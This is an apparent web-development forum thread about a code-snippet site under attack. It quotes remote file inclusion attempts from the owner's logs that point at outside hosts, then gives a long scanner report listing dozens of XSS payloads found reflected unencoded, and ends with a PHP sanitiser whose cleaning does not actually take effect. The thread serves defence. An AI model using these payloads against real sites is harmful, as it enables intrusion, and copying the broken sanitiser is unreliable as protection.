Code snippet site

[DeanWhitehouse]

Can some people check over my site as i have just had a few hacking attempts on the site

http://djw-webdesign.awardspace.com/

The attempt was at remote file inclusion

From my hit/404 logger

 

Page: http://djw-webdesign.awardspace.com//function_core.php?web_root=http://meetpark.com/adpics/r.txt??

Amount of hits: 4

 

Page: http://djw-webdesign.awardspace.com/code.php?snippet=11//function_core.php?web_root=http://meetpark.

Amount of hits: 4

 

Page: http://djw-webdesign.awardspace.com//function_core.php?web_root=http://cfmg.paradoxstudio.pl/chat//i

Amount of hits: 2

 

Page: http://djw-webdesign.awardspace.com/code.php?snippet=11//function_core.php?web_root=http://cfmg.para

Amount of hits: 2

[darkfreaks]

SQL Injection:

 

DOM was modified by attack string. Field appears to be very vulnerable to XSS String.

Tested value: <xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>

DOM was modified by attack string. Field appears to be very vulnerable to XSS String.

Tested value: <a href="about:<script>document.vulnerable=true;</script>">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <xml src="javascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <img src="blah>" onmouseover="document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <img src="blah"onmouseover="document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <!-- -- --><script>document.vulnerable=true;</script><!-- -- -->

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <![CDATA[<!--]]<script>document.vulnerable=true;//--></script>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <<script>document.vulnerable=true;</script>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <style><!--</style><script>document.vulnerable=true;//--></script>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <object classid="clsid:..." codebase="javascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <style type="text/javascript">document.vulnerable=true;</style>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <div style="width: expression(document.vulnerable=true;);">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <div style="binding: url([link to code]);">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <div style="behaviour: url([link to code]);">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <div style="background-image: url(javascript:document.vulnerable=true;);">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <body onload="document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <a href="about:<script>document.vulnerable=true;</script>">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <img src="livescript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <img src="mocha:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <link rel="stylesheet" href="javascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <bgsound src="javascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <input type="image" dynsrc="javascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <img dynsrc="javascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <img src="javascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <div onmouseover="document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></OBJECT>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <BASE HREF="javascript:document.vulnerable=true;//">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]-->

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <STYLE type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</STYLE>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <STYLE>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></A>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <STYLE TYPE="text/javascript">document.vulnerable=true;</STYLE>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <XSS STYLE="xss:expression(document.vulnerable=true)">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <IMG STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <STYLE>@im\port'\ja\vasc\ript:document.vulnerable=true';</STYLE>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <DIV STYLE="width: expression(document.vulnerable=true);">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <TABLE><TD BACKGROUND="javascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <TABLE BACKGROUND="javascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <DIV STYLE="background-image: url(javascript:document.vulnerable=true;)">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></FRAMESET>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <IFRAME SRC="javascript:document.vulnerable=true;"></IFRAME>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <STYLE>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <LINK REL="stylesheet" HREF="javascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <LAYER SRC="javascript:document.vulnerable=true;"></LAYER>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <BGSOUND SRC="javascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <IMG LOWSRC="javascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <IMG DYNSRC="javascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <BODY ONLOAD=document.vulnerable=true;>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <BODY BACKGROUND="javascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <INPUT TYPE="IMAGE" SRC="javascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: </TITLE><SCRIPT>document.vulnerable=true;</SCRIPT>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: \";document.vulnerable=true;;//

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <SCRIPT>a=/XSS/\ndocument.vulnerable=true;</SCRIPT>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <iframe src="javascript:document.vulnerable=true; <

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <IMG SRC="javascript:document.vulnerable=true;"

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <SCRIPT <B>document.vulnerable=true;</SCRIPT>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <<SCRIPT>document.vulnerable=true;//<</SCRIPT>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <IMG SRC="javascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <IMG SRC="jav ascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <SCRIPT>document.vulnerable=true;</SCRIPT>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">

 

<?php
//**********loops all $_POST variables and cleans them automatically*************///
if(get_magic_quotes_gpc())
{
//clean XSS/SQL injection
function clean($var) {

$var=strip_tags(trim(mysql_real_escape_string($var)));//changed $text to $var my bad
$var=htmlspecialchars($var,ENT_QUOTES);
return $var;
}

array_walk_recursive($_POST,'clean');
} 
?>